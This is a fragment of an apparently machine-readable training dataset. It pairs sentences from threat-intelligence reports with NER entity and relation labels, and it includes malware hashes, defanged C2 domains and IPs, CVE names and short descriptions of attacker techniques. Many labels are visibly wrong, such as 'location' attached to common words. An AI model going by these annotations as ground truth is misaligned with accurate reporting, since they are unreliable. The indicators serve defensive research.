","entities":[{"id":36121,"label":"location","start_offset":20,"end_offset":23},{"id":36122,"label":"SHA2","start_offset":90,"end_offset":154},{"id":36123,"label":"SHA2","start_offset":195,"end_offset":259},{"id":36124,"label":"SHA2","start_offset":300,"end_offset":364},{"id":36125,"label":"SHA2","start_offset":435,"end_offset":499}],"relations":[],"Comments":[]} +{"id":3947,"text":"Successful exploitation of CVE-2020-0688 gives Chopper access to system privileges.","entities":[{"id":49794,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":49795,"label":"malware","start_offset":47,"end_offset":54}],"relations":[],"Comments":[]} +{"id":3306,"text":"The decrypted result will be sent to the C&C server.","entities":[],"relations":[],"Comments":[]} +{"id":10726,"text":"Their attachments exploit a vulnerability in Ichitaro, as shown above.","entities":[],"relations":[],"Comments":[]} +{"id":14363,"text":"Note: The green nodes represent Android samples, while the blue nodes represent Windows samples.","entities":[],"relations":[],"Comments":[]} +{"id":2828,"text":"The initial variant of WanaCrypt0r uses hxxp:\/\/iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com, however, there are reports of newer variants using different domains.","entities":[{"id":48040,"label":"URL","start_offset":40,"end_offset":94},{"id":8633,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} +{"id":7504,"text":"The third part contains the backdoor function.","entities":[],"relations":[],"Comments":[]} +{"id":2905,"text":"= 753635372;","entities":[],"relations":[],"Comments":[]} +{"id":4749,"text":"Last year, TAG identified an ongoing campaign targeting security researchers working on vulnerability research and development at different companies and organizations.","entities":[{"id":50658,"label":"identity","start_offset":11,"end_offset":14}],"relations":[],"Comments":[]} +{"id":13690,"text":"An email sample with the same originating IP Figure 11.","entities":[],"relations":[],"Comments":[]} +{"id":13175,"text":"In our technical brief, we broke down how Tropic Trooper has changed the way it uses the abovementioned USBferry versions in attacks.","entities":[{"id":41115,"label":"threat-actor","start_offset":42,"end_offset":56},{"id":41116,"label":"location","start_offset":73,"end_offset":76},{"id":41117,"label":"malware","start_offset":104,"end_offset":112}],"relations":[],"Comments":[]} +{"id":6258,"text":" Chrome extensions allow developers to extend Google\u2019s Chrome browser, typically by adding new functionality.","entities":[],"relations":[],"Comments":[]} +{"id":6795,"text":"If the downloaded file size in the first step exceeds 10,485 bytes, then the file is saved as \u201c%APPDATA%\\\\Microsoft\\Windows\\Cookies.txt\u201d (MITRE ATT&CK framework ID T1105)","entities":[],"relations":[],"Comments":[]} +{"id":4845,"text":"We have also observed Indian hack-for-hire firms work with freelance actors not directly employed by the firms themselves.","entities":[{"id":50804,"label":"location","start_offset":22,"end_offset":28},{"id":50805,"label":"identity","start_offset":29,"end_offset":48}],"relations":[{"id":1019,"from_id":50805,"to_id":50804,"type":"located-at"}],"Comments":[]} +{"id":1353,"text":"There is a Cortex XSOAR pack available to assist with detecting and mitigating both threats.","entities":[{"id":44973,"label":"SOFTWARE","start_offset":11,"end_offset":23}],"relations":[],"Comments":[]} +{"id":3952,"text":"For its discovery, it uses typical Windows command-line tools such as nltest, ping, whoami, netstat, net, nslookup, hostname, and tasklist, which are commonly used in other attacks.","entities":[{"id":49799,"label":"tools","start_offset":84,"end_offset":90},{"id":49797,"label":"tools","start_offset":70,"end_offset":76},{"id":49798,"label":"tools","start_offset":78,"end_offset":82},{"id":49804,"label":"tools","start_offset":131,"end_offset":139},{"id":49801,"label":"tools","start_offset":102,"end_offset":105},{"id":49802,"label":"tools","start_offset":107,"end_offset":115},{"id":49800,"label":"tools","start_offset":93,"end_offset":100},{"id":49803,"label":"tools","start_offset":117,"end_offset":125}],"relations":[],"Comments":[]} +{"id":367,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":11233,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} +{"id":8335,"text":"Once the attacker has logged in to the victim\u2019s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not.","entities":[],"relations":[],"Comments":[]} +{"id":10763,"text":"Safeguard the email gateway to defend against REDBALDKNIGHT\u2019s spear phishing methods.","entities":[{"id":32893,"label":"location","start_offset":20,"end_offset":27},{"id":32894,"label":"threat-actor","start_offset":46,"end_offset":59},{"id":32895,"label":"attack-pattern","start_offset":62,"end_offset":76}],"relations":[],"Comments":[]} +{"id":8985,"text":"Threat actor modified version 2.2.0 of Windows MiMi chat installer to download and execute HyperBro backdoor May 2021:","entities":[{"id":27765,"label":"location","start_offset":52,"end_offset":56},{"id":27766,"label":"location","start_offset":79,"end_offset":82},{"id":27767,"label":"tools","start_offset":91,"end_offset":99}],"relations":[],"Comments":[]} +{"id":13647,"text":"It appears that their technical capabilities are limited despite being able to successfully target high-level employees globally.","entities":[],"relations":[],"Comments":[]} +{"id":7267,"text":"Recently they have also been discovered by researchers from Volexity to be using malicious websites to propagate malware.","entities":[],"relations":[],"Comments":[]} +{"id":1254,"text":" DragonOK has previously targeted Japanese high-tech and manufacturing firms, but we\u2019ve identified a new backdoor malware, named \u201cFormerFirstRAT,\u201d deployed by these attackers.","entities":[{"id":3828,"label":"threat-actor","start_offset":1,"end_offset":9},{"id":3832,"label":"malware","start_offset":130,"end_offset":144},{"id":44952,"label":"identity","start_offset":34,"end_offset":76}],"relations":[{"id":198,"from_id":3832,"to_id":3828,"type":"authored-by"},{"id":197,"from_id":3828,"to_id":44952,"type":"targets"}],"Comments":[]} +{"id":2762,"text":"Bash is the default shell for the most-popular Linux variants and every version of the software stretching back over two decades is vulnerable.","entities":[{"id":47996,"label":"SOFTWARE","start_offset":47,"end_offset":52}],"relations":[],"Comments":[]} +{"id":1079,"text":" Of course, one of the best protections against malicious apps is to get your Android apps only from Google Play, as the Android Security Team aggressively screens against malicious apps and keeps them out of the store in the first place.","entities":[{"id":46562,"label":"SOFTWARE","start_offset":101,"end_offset":112},{"id":46561,"label":"SOFTWARE","start_offset":78,"end_offset":85},{"id":46563,"label":"identity","start_offset":121,"end_offset":142}],"relations":[],"Comments":[]} +{"id":7340,"text":"It appears hacking group Outlaw, which has been silent for the past few months, was simply developing their toolkit for illicit income sources.","entities":[],"relations":[],"Comments":[]} +{"id":6528,"text":"\u0645\u06a9\u062a\u0628\u0629 \u0625\u0644\u06a9\u062a\u0631\u0648\u0646\u06cc\u0629 .zip f865531608a4150ea5d77ef3dd148209881fc8d831b2cfb8ca95ceb5868e1393 PUA.Win32.RemoteUtilities.A Archive containing RemoteUtilities","entities":[{"id":20235,"label":"SHA2","start_offset":21,"end_offset":85},{"id":20236,"label":"malware","start_offset":133,"end_offset":148}],"relations":[],"Comments":[]} +{"id":686,"text":"OLE Objects & HTA Handlers are mechanisms Office documents use to make references to include other documents in their content.","entities":[],"relations":[],"Comments":[]} +{"id":1901,"text":" Some simply contain a random template with empty categories, likely as a ploy to hide its malicious activities.","entities":[],"relations":[],"Comments":[]} +{"id":6778,"text":"The email that used the coronavirus-related subject came with an attached document file.","entities":[],"relations":[],"Comments":[]} +{"id":13512,"text":"Curtailing cybermercenary attacks","entities":[],"relations":[],"Comments":[]} +{"id":208,"text":"This executable is a signed file with a valid signature from an organization named Hermetica Digital Ltd. This signing certificate has since been explicitly revoked by its issuer.","entities":[{"id":45906,"label":"identity","start_offset":83,"end_offset":104}],"relations":[],"Comments":[]} +{"id":9942,"text":"Improve employee awareness on the latest attack techniques that cybercriminals use.","entities":[],"relations":[],"Comments":[]} +{"id":2465,"text":"At the time of writing, we have observed 95 unique webshell filenames, which we have included in the indicators section.","entities":[],"relations":[],"Comments":[]} +{"id":11439,"text":"We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source.","entities":[{"id":34950,"label":"location","start_offset":83,"end_offset":90},{"id":34951,"label":"attack-pattern","start_offset":177,"end_offset":183}],"relations":[],"Comments":[]} +{"id":2058,"text":"From the GitHub page, we also observed a URL to a site \u2013 xn--90a5ai[.]com(\u0444\u0441\u0431[.]com) \u2013 resolving to the previously mentioned IP 164[.]68[.]114[.]29, which at this point in time only shows an animation of interconnecting points.","entities":[{"id":45239,"label":"DOMAIN","start_offset":74,"end_offset":83},{"id":45240,"label":"IPV4","start_offset":128,"end_offset":147},{"id":45237,"label":"SOFTWARE","start_offset":9,"end_offset":15},{"id":45238,"label":"DOMAIN","start_offset":57,"end_offset":73}],"relations":[{"id":306,"from_id":45238,"to_id":45240,"type":"related-to"},{"id":307,"from_id":45239,"to_id":45240,"type":"related-to"}],"Comments":[]} +{"id":12700,"text":"To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain.","entities":[],"relations":[],"Comments":[]} +{"id":9015,"text":"We identified a number of servers Lazarus used as a backend system for temporarily holding stolen data.","entities":[],"relations":[],"Comments":[]} +{"id":1998,"text":"This ransomware family uses a modified ClamAV logo in their executables.","entities":[{"id":45218,"label":"SOFTWARE","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} +{"id":2801,"text":"While the initial attack vector for these attacks is unknown, it is certain that the spread of the ransomware occurs through active exploitation of the ETERNALBLUE vulnerability (CVE-2017-0144) in Microsoft Windows.","entities":[{"id":48017,"label":"vulnerability","start_offset":179,"end_offset":192},{"id":48018,"label":"SOFTWARE","start_offset":197,"end_offset":214},{"id":8563,"label":"vulnerability","start_offset":152,"end_offset":163}],"relations":[{"id":371,"from_id":48018,"to_id":48017,"type":"has"},{"id":373,"from_id":8563,"to_id":48017,"type":"related-to"}],"Comments":[]} +{"id":4097,"text":"Here is a list of the C&C commands:","entities":[],"relations":[],"Comments":[]} +{"id":13256,"text":"Another interesting PDB string we found is - D:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\InstallClient.pdb.","entities":[],"relations":[],"Comments":[]} +{"id":1774,"text":"Using these operations, attackers are able to modify the length values to create an object with an incorrect size, which will allow for read and write operations to occur in memory that is not part of the vector object.","entities":[],"relations":[],"Comments":[]} +{"id":4465,"text":"Google was able to identify the vulnerability in use and fix the exploit quickly.","entities":[{"id":50253,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":334,"text":"The green box contains four links that will work only for your system.","entities":[],"relations":[],"Comments":[]} +{"id":1403,"text":"As the malware infects more systems, the systems begin sending more e-mails which leads to more infections.","entities":[],"relations":[],"Comments":[]} +{"id":2001,"text":"Additionally, some of the observed samples include properties information that can be observed in Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":3723,"text":"In the final phase of the attack, the groups exfiltrate the stolen data into the normal communications channel via command-and-control channels.","entities":[],"relations":[],"Comments":[]} +{"id":5161,"text":"[04:55] What do you think?","entities":[],"relations":[],"Comments":[]} +{"id":1177,"text":" chinese-hacker-2 - We\u2019re not sure which is worse: that this is a legitimate signature or a sad frame job.","entities":[],"relations":[],"Comments":[]} +{"id":3365,"text":".Python.BIOPASS.A f21decb19da8d8c07066a78839ffd8af6721b1f4323f10a1df030325a1a5e159 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module)","entities":[{"id":10182,"label":"malware","start_offset":98,"end_offset":109},{"id":10181,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48983,"label":"FILEPATH","start_offset":85,"end_offset":96},{"id":48984,"label":"malware","start_offset":1,"end_offset":17}],"relations":[{"id":542,"from_id":10181,"to_id":10182,"type":"indicates"},{"id":543,"from_id":48983,"to_id":10182,"type":"indicates"},{"id":544,"from_id":48983,"to_id":10181,"type":"duplicate-of"},{"id":545,"from_id":48984,"to_id":10182,"type":"duplicate-of"}],"Comments":[]} +{"id":4723,"text":"Although this Committee must be concerned with the exploits of NSO Group, it is not the only entity posing risks to our users.","entities":[{"id":50622,"label":"threat-actor","start_offset":63,"end_offset":72}],"relations":[],"Comments":[]} +{"id":1274,"text":"(Figure 6) Figure 6.","entities":[],"relations":[],"Comments":[]} +{"id":3932,"text":"We saw a noticeable difference with this attack compared to other Chopper attacks \u2014 its use of the .dat file extension, which is commonly used for data storage purposes, such as in a user profile\u2019s ntuser.dat.","entities":[{"id":49774,"label":"malware","start_offset":66,"end_offset":73}],"relations":[],"Comments":[]} +{"id":14269,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":4695,"text":"C2s 136.243.108.14 173.209.51.54 HYPERSCRAPE binaries","entities":[{"id":50578,"label":"malware","start_offset":33,"end_offset":44},{"id":14210,"label":"IPV4","start_offset":4,"end_offset":18},{"id":14211,"label":"IPV4","start_offset":19,"end_offset":32}],"relations":[],"Comments":[]} +{"id":5070,"text":"On February 10, Threat Analysis Group discovered two distinct North Korean government-backed attacker groups exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609.","entities":[{"id":51176,"label":"TIME","start_offset":3,"end_offset":14},{"id":51177,"label":"identity","start_offset":16,"end_offset":37},{"id":51178,"label":"threat-actor","start_offset":62,"end_offset":108},{"id":51179,"label":"vulnerability","start_offset":122,"end_offset":157},{"id":51180,"label":"vulnerability","start_offset":169,"end_offset":182},{"id":51181,"label":"SOFTWARE","start_offset":161,"end_offset":167}],"relations":[{"id":1068,"from_id":51179,"to_id":51180,"type":"duplicate-of"},{"id":1069,"from_id":51181,"to_id":51180,"type":"has"},{"id":1070,"from_id":51178,"to_id":51180,"type":"exploits"}],"Comments":[]} +{"id":10639,"text":"The operations use inauthentic news outlets to disseminate messages promoting Russian interests in Africa.","entities":[],"relations":[],"Comments":[]} +{"id":14049,"text":"In our previous detailed analysis of Operation Earth Kitsune, one of the delivery architecture for the espionage backdoors is designed as shown in Figure 6. Figure 6.","entities":[{"id":47202,"label":"campaign","start_offset":37,"end_offset":60}],"relations":[],"Comments":[]} +{"id":6749,"text":"While it\u2019s not unusual to see some fluctuations in these numbers, it could be that attackers, just like many other organizations, are experiencing productivity lags and issues due to global lockdowns and quarantine efforts.","entities":[{"id":21059,"label":"identity","start_offset":94,"end_offset":98},{"id":21060,"label":"location","start_offset":104,"end_offset":108},{"id":21061,"label":"location","start_offset":130,"end_offset":133},{"id":21062,"label":"location","start_offset":165,"end_offset":168},{"id":21063,"label":"location","start_offset":200,"end_offset":203}],"relations":[],"Comments":[]} +{"id":4716,"text":"NSO Group continues to pose risks across the Internet ecosystem.","entities":[{"id":50610,"label":"threat-actor","start_offset":0,"end_offset":9}],"relations":[],"Comments":[]} +{"id":12239,"text":"We terminated 2 YouTube channels as part of our investigation into coordinated influence operations linked to Moldova.","entities":[],"relations":[],"Comments":[]} +{"id":10342,"text":"Executing the malicious routine via Document_Open()","entities":[],"relations":[],"Comments":[]} +{"id":5404,"text":"Combined, these allow for the possibility of what we refer to as \"eternal botnets.\"","entities":[],"relations":[],"Comments":[]} +{"id":5841,"text":"So, you're able to instantaneously provide some type of propaganda or misinformation around the globe.","entities":[{"id":18031,"label":"location","start_offset":48,"end_offset":52},{"id":18032,"label":"malware","start_offset":96,"end_offset":101}],"relations":[],"Comments":[]} +{"id":3037,"text":"b. The operating system on the device: Some devices don\u2019t have an operating system separate from the firmware, but many do.","entities":[],"relations":[],"Comments":[]} +{"id":4107,"text":"We think attackers use this value to verify if the incoming packet belongs to their backdoor and filter out the noise.","entities":[],"relations":[],"Comments":[]} +{"id":3409,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9eed9a2e0edf38f6354f4e57b3a6b9bed5b19263f54bcee19e66fc8af0c29e4e test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9f34d28562e7e1e3721bbf679c58aa8f5898995ed999a641f26de120f3a42cf4 Silverlight1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9ff906ffcde32e4c6fb3ea4652e6d6326713a7fde8bb783b52f12a1f382f8798 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A a7c4dac7176e291bd2aba860e1aa301fb5f7d880794f493f2dea0982e2b7eb31 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b48e01ff816f12125f9f4cfc9180d534c7c57ef4ee50c0ebbe445e88d4ade939 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b9d0838be8952ebd4218c8f548ce94901f789ec1e32f5eaf46733f0c94c77999 Silverlight_ins.exe ","entities":[{"id":10275,"label":"malware","start_offset":0,"end_offset":11},{"id":10276,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10277,"label":"malware","start_offset":122,"end_offset":133},{"id":10279,"label":"malware","start_offset":252,"end_offset":263},{"id":10281,"label":"malware","start_offset":374,"end_offset":385},{"id":10282,"label":"SHA2","start_offset":420,"end_offset":484},{"id":10283,"label":"malware","start_offset":496,"end_offset":507},{"id":10284,"label":"SHA2","start_offset":542,"end_offset":606},{"id":10285,"label":"malware","start_offset":618,"end_offset":629},{"id":10286,"label":"SHA2","start_offset":664,"end_offset":728},{"id":10287,"label":"malware","start_offset":751,"end_offset":762},{"id":10288,"label":"SHA2","start_offset":797,"end_offset":861},{"id":10278,"label":"SHA2","start_offset":168,"end_offset":232},{"id":10280,"label":"SHA2","start_offset":298,"end_offset":362},{"id":49076,"label":"malware","start_offset":20,"end_offset":44},{"id":49078,"label":"FILEPATH","start_offset":234,"end_offset":250},{"id":49079,"label":"malware","start_offset":272,"end_offset":296},{"id":49081,"label":"malware","start_offset":394,"end_offset":418},{"id":49083,"label":"malware","start_offset":516,"end_offset":540},{"id":49087,"label":"malware","start_offset":771,"end_offset":795},{"id":49077,"label":"malware","start_offset":142,"end_offset":166},{"id":49080,"label":"FILEPATH","start_offset":364,"end_offset":372},{"id":49084,"label":"FILEPATH","start_offset":608,"end_offset":616},{"id":49086,"label":"FILEPATH","start_offset":730,"end_offset":749},{"id":49088,"label":"FILEPATH","start_offset":863,"end_offset":882},{"id":49089,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49082,"label":"FILEPATH","start_offset":486,"end_offset":494},{"id":49085,"label":"malware","start_offset":638,"end_offset":662}],"relations":[{"id":654,"from_id":10275,"to_id":49076,"type":"duplicate-of"},{"id":655,"from_id":10277,"to_id":49077,"type":"duplicate-of"},{"id":656,"from_id":10279,"to_id":49079,"type":"duplicate-of"},{"id":657,"from_id":10281,"to_id":49081,"type":"duplicate-of"},{"id":658,"from_id":10283,"to_id":49083,"type":"duplicate-of"},{"id":659,"from_id":10285,"to_id":49085,"type":"duplicate-of"},{"id":660,"from_id":10287,"to_id":49087,"type":"duplicate-of"},{"id":661,"from_id":49088,"to_id":10288,"type":"duplicate-of"},{"id":662,"from_id":49086,"to_id":10286,"type":"duplicate-of"},{"id":663,"from_id":49084,"to_id":10284,"type":"duplicate-of"},{"id":664,"from_id":49082,"to_id":10282,"type":"duplicate-of"},{"id":665,"from_id":49080,"to_id":10280,"type":"duplicate-of"},{"id":666,"from_id":49078,"to_id":10278,"type":"duplicate-of"},{"id":667,"from_id":49089,"to_id":10276,"type":"duplicate-of"},{"id":668,"from_id":10276,"to_id":49076,"type":"indicates"},{"id":669,"from_id":49089,"to_id":49076,"type":"indicates"},{"id":670,"from_id":49078,"to_id":49077,"type":"indicates"},{"id":671,"from_id":10278,"to_id":49077,"type":"indicates"},{"id":672,"from_id":49080,"to_id":49079,"type":"indicates"},{"id":673,"from_id":10280,"to_id":49079,"type":"indicates"},{"id":674,"from_id":49082,"to_id":49081,"type":"indicates"},{"id":675,"from_id":10282,"to_id":49081,"type":"indicates"},{"id":676,"from_id":49084,"to_id":49083,"type":"indicates"},{"id":677,"from_id":10284,"to_id":49083,"type":"indicates"},{"id":678,"from_id":49086,"to_id":49085,"type":"indicates"},{"id":679,"from_id":10286,"to_id":49085,"type":"indicates"},{"id":680,"from_id":49088,"to_id":10287,"type":"indicates"}],"Comments":[]} +{"id":4949,"text":"Services from Dropbox and Microsoft are also abused.","entities":[{"id":50974,"label":"identity","start_offset":26,"end_offset":35},{"id":50973,"label":"identity","start_offset":14,"end_offset":21}],"relations":[],"Comments":[]} +{"id":4003,"text":"A UCG is also formed for integrating private sector partners into incident response efforts.","entities":[{"id":49860,"label":"identity","start_offset":2,"end_offset":5}],"relations":[],"Comments":[]} +{"id":14014,"text":"Operating system language version","entities":[],"relations":[],"Comments":[]} +{"id":1634,"text":" To rate and comment on applications, users must have a Google account.","entities":[{"id":46857,"label":"SOFTWARE","start_offset":56,"end_offset":62}],"relations":[],"Comments":[]} +{"id":5697,"text":"The group has three primary attack vectors, two of which involve social engineering.","entities":[],"relations":[],"Comments":[]} +{"id":14002,"text":"In that sense, we are emphasizing TTPs correlation in this case.","entities":[],"relations":[],"Comments":[]} +{"id":2374,"text":"Countries affected by Earth Baku\u2019s new campaign Source: Trend Micro\u2122 Smart Protection Network\u2122 infrastructure StealthVector","entities":[{"id":47434,"label":"threat-actor","start_offset":22,"end_offset":32},{"id":47436,"label":"malware","start_offset":110,"end_offset":123},{"id":47435,"label":"SOFTWARE","start_offset":56,"end_offset":94}],"relations":[],"Comments":[]} +{"id":4839,"text":"They also conduct corporate espionage, handily obscuring their clients\u2019 role.","entities":[],"relations":[],"Comments":[]} +{"id":3368,"text":" 40ab025d455083500bfb0c7c64e78967d4d06f91580912dccf332498681ebaf6","entities":[{"id":10183,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} +{"id":3393,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3e8f8b8a5f70c195a2e4d4fc7f80523809f6dbf9ead061ce8ef04fb489a577cf test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba flash_installer.exe ","entities":[{"id":10244,"label":"malware","start_offset":0,"end_offset":11},{"id":10246,"label":"malware","start_offset":128,"end_offset":139},{"id":10245,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10247,"label":"SHA2","start_offset":174,"end_offset":238},{"id":49048,"label":"malware","start_offset":20,"end_offset":44},{"id":49047,"label":"malware","start_offset":148,"end_offset":172},{"id":49050,"label":"FILEPATH","start_offset":240,"end_offset":259},{"id":49049,"label":"FILEPATH","start_offset":112,"end_offset":126}],"relations":[{"id":600,"from_id":10244,"to_id":49048,"type":"duplicate-of"},{"id":601,"from_id":10246,"to_id":49047,"type":"duplicate-of"},{"id":602,"from_id":49049,"to_id":10245,"type":"duplicate-of"},{"id":603,"from_id":49050,"to_id":10247,"type":"duplicate-of"},{"id":604,"from_id":10247,"to_id":49047,"type":"indicates"},{"id":605,"from_id":49050,"to_id":49047,"type":"indicates"},{"id":606,"from_id":49049,"to_id":49048,"type":"indicates"},{"id":607,"from_id":10245,"to_id":49048,"type":"indicates"}],"Comments":[]} +{"id":1332,"text":"This new thread is responsible for all malicious activities produced by this DLL.","entities":[],"relations":[],"Comments":[]} +{"id":10724,"text":"One of the decoy documents, for instance, was about the \u201cplan of disaster prevention in heisei 20\u201d (Heisei is the current\/modern era in Japan). Figure 1: File properties of one of the decoy documents that REDBALDKNIGHT sends to Japanese targets Figures 2: Sample of decoy documents used by REDBALDKNIGHT, employing socially engineered titles in their spear phishing emails such as \u201cdisaster prevention\u201d","entities":[{"id":32766,"label":"location","start_offset":11,"end_offset":16},{"id":32767,"label":"location","start_offset":129,"end_offset":132},{"id":32771,"label":"location","start_offset":185,"end_offset":190},{"id":32775,"label":"location","start_offset":258,"end_offset":264},{"id":32776,"label":"location","start_offset":268,"end_offset":273},{"id":32778,"label":"attack-pattern","start_offset":353,"end_offset":367}],"relations":[],"Comments":[]} +{"id":85,"text":"This will also help you identify the coin mining \u201cinsider threat,\u201d as misguided administrators may see their organizations\u2019 unused CPU time as a way to generate personal income.","entities":[],"relations":[],"Comments":[]} +{"id":14366,"text":"Downloading only from legitimate app stores like Google Play can prevent Maikspy from compromising computers and mobile devices.","entities":[],"relations":[],"Comments":[]} +{"id":1514,"text":" If the file is run in a path including the \"IptabLes\" string then it installs itself as a startup service and proceeds into its main loop.","entities":[],"relations":[],"Comments":[]} +{"id":11087,"text":"We terminated 34 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Myanmar.","entities":[],"relations":[],"Comments":[]} +{"id":2810,"text":"In addition, Unit 42 research has shown that very few have attempted to pay the ransom.","entities":[{"id":48029,"label":"identity","start_offset":13,"end_offset":20}],"relations":[],"Comments":[]} +{"id":3537,"text":"A robust threat hunting strategy, for instance, helps validate indicators of attack to ascertain if the intrusions, threats, or suspicious system activities are one-off attacks or part of a larger campaign.","entities":[],"relations":[],"Comments":[]} +{"id":1882,"text":"AvosLocker executable 05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYXBLNT Mimikatz executable (x32 and x64) 912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA e81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW Log4shell Nmap NSE script ddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YACAH Impacket tool 14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA","entities":[{"id":5525,"label":"tools","start_offset":120,"end_offset":128},{"id":5529,"label":"tools","start_offset":352,"end_offset":356},{"id":5523,"label":"SHA2","start_offset":22,"end_offset":86},{"id":5530,"label":"SHA2","start_offset":368,"end_offset":432},{"id":5522,"label":"malware","start_offset":0,"end_offset":10},{"id":5527,"label":"SHA2","start_offset":154,"end_offset":218},{"id":5528,"label":"SHA2","start_offset":248,"end_offset":312},{"id":5533,"label":"SHA2","start_offset":481,"end_offset":545},{"id":5531,"label":"tools","start_offset":467,"end_offset":475},{"id":47007,"label":"tools","start_offset":546,"end_offset":572},{"id":47009,"label":"tools","start_offset":219,"end_offset":247},{"id":47011,"label":"vulnerability","start_offset":342,"end_offset":351},{"id":47012,"label":"malware","start_offset":87,"end_offset":119},{"id":47008,"label":"tools","start_offset":313,"end_offset":341},{"id":47010,"label":"tools","start_offset":433,"end_offset":466}],"relations":[{"id":288,"from_id":47012,"to_id":5522,"type":"duplicate-of"},{"id":287,"from_id":5522,"to_id":5523,"type":"consists-of"}],"Comments":[]} +{"id":3289,"text":"Shell","entities":[],"relations":[],"Comments":[]} +{"id":10282,"text":"Code snippets showing the exfiltration of data The secondary payload with the filename Google Drivemonitor.exe (0b94e123f6586967819fa247cdd58779b1120ef93fa1ea1de70dffc898054a09) is a keylogger.","entities":[{"id":31404,"label":"SHA2","start_offset":116,"end_offset":180}],"relations":[],"Comments":[]} +{"id":1622,"text":" Util.java With the phone\u2019s number captured, Funtasy then registers the mobile account with a premium SMS service by sending an HTTP POST request to the following URL. The request is made without the users knowledge, they have no choice to select a number.","entities":[{"id":46848,"label":"FILEPATH","start_offset":1,"end_offset":10}],"relations":[],"Comments":[]} +{"id":2800,"text":"Unit 42 and other researchers have concluded that these reports are not substantiated.","entities":[{"id":48016,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":12065,"text":"One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.","entities":[{"id":37340,"label":"location","start_offset":11,"end_offset":15},{"id":37342,"label":"attack-pattern","start_offset":107,"end_offset":115}],"relations":[],"Comments":[]} +{"id":14192,"text":"However, Conti was forced to equivocate its language after a Ukrainian researcher doxxed the group with a devastating leak of source code and other internal information.","entities":[{"id":48231,"label":"threat-actor","start_offset":9,"end_offset":15}],"relations":[],"Comments":[]} +{"id":1262,"text":"All five phishing campaigns targeted a Japanese manufacturing firm over the course of two months, but the final campaign also targeted a separate Japanese high-tech organization.","entities":[{"id":46637,"label":"attack-pattern","start_offset":9,"end_offset":27},{"id":46639,"label":"identity","start_offset":146,"end_offset":177},{"id":46638,"label":"identity","start_offset":39,"end_offset":61}],"relations":[{"id":203,"from_id":46637,"to_id":46639,"type":"targets"},{"id":202,"from_id":46637,"to_id":46638,"type":"targets"}],"Comments":[]} +{"id":3007,"text":"While You\u2019re at it, Protect Your Gaming Consoles:","entities":[],"relations":[],"Comments":[]} +{"id":2096,"text":" Palo Alto Networks detects and prevents HelloXD and x4k activity in the following ways: If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:","entities":[{"id":47231,"label":"identity","start_offset":181,"end_offset":211},{"id":47228,"label":"identity","start_offset":1,"end_offset":19},{"id":47229,"label":"malware","start_offset":41,"end_offset":48},{"id":47230,"label":"threat-actor","start_offset":53,"end_offset":56}],"relations":[],"Comments":[]} +{"id":9427,"text":"Hijacking loaded module","entities":[],"relations":[],"Comments":[]} +{"id":5590,"text":"Here are some best practices to protect your systems against threats that leverage the gaps in your NAS devices: ","entities":[{"id":17191,"label":"location","start_offset":5,"end_offset":8},{"id":17192,"label":"location","start_offset":14,"end_offset":18},{"id":17193,"label":"malware","start_offset":74,"end_offset":82}],"relations":[],"Comments":[]} +{"id":1446,"text":"Android allows apps signed by the same certificate to run in the same process and treats them as one single application instead of separate ones.","entities":[{"id":46772,"label":"SOFTWARE","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} +{"id":839,"text":" To understand what makes kernel APC attacks so dangerous, it\u2019s important to understand what they are. The kernel is the heart of the operating system.","entities":[{"id":46388,"label":"attack-pattern","start_offset":26,"end_offset":44}],"relations":[],"Comments":[]} +{"id":2535,"text":"Like many ransomware gangs, Conti is constantly adapting to changes, including recent heightened scrutiny by law enforcement and policy makers following high-profile disruptive attacks on the Colonial pipeline and healthcare organizations.","entities":[{"id":47726,"label":"threat-actor","start_offset":28,"end_offset":33},{"id":47727,"label":"identity","start_offset":192,"end_offset":209}],"relations":[],"Comments":[]} +{"id":8139,"text":"Data of WeChat, 